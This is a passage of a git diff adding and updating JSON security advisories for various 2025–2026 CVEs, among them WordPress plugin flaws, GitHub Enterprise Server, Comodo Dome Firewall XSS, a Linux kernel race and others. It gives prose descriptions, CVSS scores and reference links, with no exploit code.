"https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json new file mode 100644 index 0000000000000..99f0b7c0423c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p546-7whm-cxpm", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0573" + ], + "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0573" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.22" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.17" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.13" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.10" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.4" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json new file mode 100644 index 0000000000000..0a3cb7dbead1e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p572-g32f-hp32", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2296" + ], + "details": "The Product Addons for Woocommerce – Product Options with Custom Fields plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 3.1.0. This is due to insufficient input validation of the 'operator' field in conditional logic rules within the evalConditions() function, which passes unsanitized user input directly to PHP's eval() function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject and execute arbitrary PHP code on the server via the conditional logic 'operator' parameter when saving addon form field rules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458823%40woo-custom-product-addons&new=3458823%40woo-custom-product-addons&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c1edd7-2421-4dfa-8775-ca0497759d52?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json new file mode 100644 index 0000000000000..17e678a98a6f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p57f-h2f5-67v8", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69406" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX FreightCo freightco allows PHP Local File Inclusion.This issue affects FreightCo: from n/a through <= 1.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69406" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/freightco/vulnerability/wordpress-freightco-theme-1-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json new file mode 100644 index 0000000000000..728309edfa2e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5gf-vhgm-432f", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-15559" + ], + "details": "An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the “guid” parameter. This allows an attacker to execute arbitrary commands on the WorkTime server as NT Authority\\SYSTEM with the highest privileges. Attackers are able to access or manipulate sensitive data and take over the whole server.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15559" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/worktime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json b/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json new file mode 100644 index 0000000000000..2faf5cb5f82fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5q9-gghv-g686/GHSA-p5q9-gghv-g686.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5q9-gghv-g686", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25425" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the VIRUS_ADMIN parameter. Attackers can send POST requests to the smtpconfig endpoint with script payloads to execute arbitrary JavaScript in the context of an administrator's browser session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25425" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-smtpconfig" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json b/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json new file mode 100644 index 0000000000000..28faf97b4f502 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5qh-w693-vjqf/GHSA-p5qh-w693-vjqf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5qh-w693-vjqf", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25408" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the netmask_addr parameter. Attackers can send POST requests to the netwizard2 endpoint with script payloads in the netmask_addr parameter to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25408" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-netwizard" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json index 881cb7f8c38ce..7648f4aeda355 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p5wr-5p37-2wm6", - "modified": "2026-02-14T03:32:08Z", + "modified": "2026-02-17T15:31:33Z", "published": "2026-02-07T00:30:27Z", "aliases": [ "CVE-2026-1731" ], "details": "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json b/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json new file mode 100644 index 0000000000000..6bc5a604ad17c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-fv9m-v746/GHSA-p5wr-fv9m-v746.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5wr-fv9m-v746", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25365" + ], + "details": "ChaosPro 2.0 contains a buffer overflow vulnerability in the configuration file path handling that allows attackers to execute arbitrary code by overwriting the Structured Exception Handler. Attackers can craft a malicious configuration file with carefully constructed payload to overwrite memory and gain remote code execution on vulnerable Windows XP systems.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25365" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47551" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/chaospro-buffer-overflow" + }, + { + "type": "WEB", + "url": "http://www.chaospro.de" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json new file mode 100644 index 0000000000000..269fd606d633f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p68h-c56f-p3v6", + "modified": "2026-02-19T18:31:44Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: split cached_fid bitfields to avoid shared-byte RMW races\n\nis_open, has_lease and on_list are stored in the same bitfield byte in\nstruct cached_fid but are updated in different code paths that may run\nconcurrently. Bitfield assignments generate byte read–modify–write\noperations (e.g. `orb $mask, addr` on x86_64), so updating one flag can\nrestore stale values of the others.\n\nA possible interleaving is:\n CPU1: load old byte (has_lease=1, on_list=1)\n CPU2: clear both flags (store 0)\n CPU1: RMW store (old | IS_OPEN) -> reintroduces cleared bits\n\nTo avoid this class of races, convert these flags to separate bool\nfields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3eaa22d688311c708b73f3c68bc6d0c8e3f0f77a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4386f6af8aaedd0c5ad6f659b40cadcc8f423828" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cfa4c37dcbcfd70866e856200ed8a2894cac578" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/569fecc56bfe4df66f05734d67daef887746656b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json new file mode 100644 index 0000000000000..427c5e54b17a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p69v-gqh4-hg9p", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69329" + ], + "details": "Deserialization of Untrusted Data vulnerability in Jthemes Prestige prestige allows Object Injection.This issue affects Prestige: from n/a through < 1.4.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69329" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/prestige/vulnerability/wordpress-prestige-theme-1-4-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json b/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json new file mode 100644 index 0000000000000..b897eb7773a8d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p6xr-26h9-q79c/GHSA-p6xr-26h9-q79c.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6xr-26h9-q79c", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25405" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the newLicense parameter. Attackers can send POST requests to the license activation endpoint with script payloads in the newLicense field to execute arbitrary JavaScript in administrators' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25405" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-licenseactivation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json b/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json new file mode 100644 index 0000000000000..60fb3b1d4f541 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p775-8qpw-4j4p/GHSA-p775-8qpw-4j4p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p775-8qpw-4j4p", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25415" + ], + "details": "Missing Authorization vulnerability in iqonicdesign WPBookit Pro wpbookit-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPBookit Pro: from n/a through <= 1.6.18.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25415" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpbookit-pro/vulnerability/wordpress-wpbookit-pro-plugin-1-6-18-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json new file mode 100644 index 0000000000000..4d6ff1e284dfc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8m9-mjw8-hvvx", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2691" + ], + "details": "A vulnerability has been found in itsourcecode Event Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_register.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2691" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/CVE/issues/40" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346491" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346491" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json new file mode 100644 index 0000000000000..4519f57b02b0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p922-cfp2-x9v3", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27319" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27319" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json new file mode 100644 index 0000000000000..3bbf46aceb5ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p937-j3mh-5m6r", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-70846" + ], + "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) on the /tools/Password/add page in the input field password.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70846" + }, + { + "type": "WEB", + "url": "https://github.com/lty628/aidigu" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json new file mode 100644 index 0000000000000..ac3ac157c81b6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p95v-rww3-j83p", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69299" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in Laborator Oxygen oxygen allows Server Side Request Forgery.This issue affects Oxygen: from n/a through <= 6.0.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69299" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/oxygen/vulnerability/wordpress-oxygen-theme-6-0-8-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json new file mode 100644 index 0000000000000..c427f0ffc3beb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p97j-p47c-p6g9", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-27069" + ], + "details": "Improper Neutralization of Input During Web Page 